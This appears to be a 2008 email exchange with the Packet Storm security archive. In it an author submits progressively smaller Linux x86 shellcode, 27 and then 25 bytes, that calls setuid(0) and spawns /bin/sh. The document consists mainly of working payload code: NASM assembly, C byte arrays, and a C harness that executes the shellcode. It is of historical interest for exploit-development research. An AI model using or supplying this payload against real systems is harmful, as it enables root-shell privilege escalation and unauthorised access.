25 bytes small GNU/Linux x86 setuid(0) && execve("/bin/sh",0,0) shellcode without NULLs.
39d14d8fdea725996065b535deff1a44e8d9d1f26dc15eaa27695b325d8940f0
Hi, i've shrinked down the shellcode to 25 bytes, the smallest setuid &
execve GNU/Linux shellcode without nulls that spawns a shell.
--------------------------------------------------------------------------------------
SMALLEST SETUID & EXECVE GNU/LINUX x86 SHELLCODE WITHOUT NULLS THAT
SPAWNS A SHELL
History:
+ v1.0 (27 bytes) =>
http://opensec.es/2008/11/14/gnulinux-x86-setuid0-execvebinsh00-shellcode-without-null/
+ v2.0 (26 bytes) => (http://vlan7.blogspot.com/)
http://packetstormsecurity.org/filedesc/smallest_setuid_execve_sc.c.html
v3.0 (25 bytes)
################
[NASM_SOURCE_CODE]
global _start
section .text
_start:
;setuid
xor ecx,ecx
lea eax,[ecx+17h];setuid syscall
int 80h
;execve
push ecx;ecx = 0
push 0x68732f6e ;sh/
push 0x69622f2f ;nib//
mov ebx,esp;pointer to "struct pt_regs"
lea eax,[ecx+0Bh];execve syscall
int 80h
[/NASM_SOURCE_CODE]
[C_SOURCE_CODE]
#include <stdio.h>
const char shellcode[]=
"\x31\xc9\x8d\x41\x17\xcd\x80\x51\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80";
int main()
{
printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 SHELLCODE WITHOUT
NULLS THAT SPAWNS A SHELL"
"\n\nCoded by Chema Garcia (aka sch3m4)"
"\n\t + sch3m4@opensec.es"
"\n\t + http://opensec.es"
"\n\n[+] Date: 22/11/2008"
"\n\n[+] Thanks to: vlan7"
"\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1);
(*(void (*)()) shellcode)();
return 0;
}
[/C_SOURCE_CODE]
--------------------------------------------------------------------------------------
Could you add it?
Greetings,
Chema García
packet@packetstormsecurity.org escribió:
> Thanks; added!
>
>
> http://packetstormsecurity.org/shellcode/smallnonulls-exec.txt fbe997136460672e07de13d11aba57fc 27 bytes small GNU/Linux x86 setuid(0) && execve("/bin/sh",0,0) shellcode without NULLs. Homepage: <a href="http://opensec.es/" target="ext">http://opensec.es/.</a> Authored By <a href=mailto:"sch3m4[at]opensec.es">Chema Garcia</a>
>
> On Thu, Nov 13, 2008 at 09:46:57PM +0100, sch3m4 wrote:
>
>> Hello, I've developped the smallest linux x86 setuid(0) &
>> execve("/bin/sh",0,0) shellcode without nullls with a size of 27bytes.
>>
>> -----------[ C Source Code ]-----------
>> /*
>> Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode
>> without NULLs
>>
>> Coded by Chema Garcia (aka sch3m4)
>> + sch3m4@opensec.es
>> + http://opensec.es
>> Shellcode Size: 27 bytes
>> Date: 13/11/2008
>> */
>>
>>
>> #include <stdio.h>
>>
>> const char shellcode[]= "\x31\xC0" //xor eax,eax
>> "\x31\xC9" //xor ecx,ecx
>> "\xB0\x17" //mov al,17h
>> "\x60" //pusha
>> "\xCD\x80" //int 80h
>> "\x61" //popa
>> "\x51" //push ecx
>> "\x68\x6E\x2F\x73\x68" //push 0x68732f6e
>> "\x68\x2F\x2F\x62\x69" //push 0x69622f2f
>> "\x89\xE3" //mov ebx, esp
>> "\xB0\x0B" //mov al,0xb
>> "\xCD\x80"; //int 0x80
>>
>> int main()
>> {
>> printf("Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0)
>> Shellcode without NULLs"
>> "\n\nCoded by Chema Garcia (aka sch3m4)"
>> "\n\t + sch3m4@opensec.es"
>> "\n\t + http://opensec.es"
>> "\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1);
>> //(*(void (*)()) shellcode)();
>>
>> return 0;
>> }
>>
>> -----------[/ C Source Code ]-----------
>>
>> -----------[ ASM Source Code ]-----------
>> global _start
>>
>> section .text
>>
>> _start:
>>
>> xor eax,eax
>> xor ecx,ecx
>> mov al,17h
>> pusha
>> int 80h ;setuid
>> popa
>> push ecx
>> push 0x68732f6e
>> push 0x69622f2f
>> mov ebx, esp
>> mov al,0xb
>> int 0x80;execve
>>
>> -----------[/ ASM Source Code ]-----------
>>
>> Greetings,
>> Chema García
>>
>
>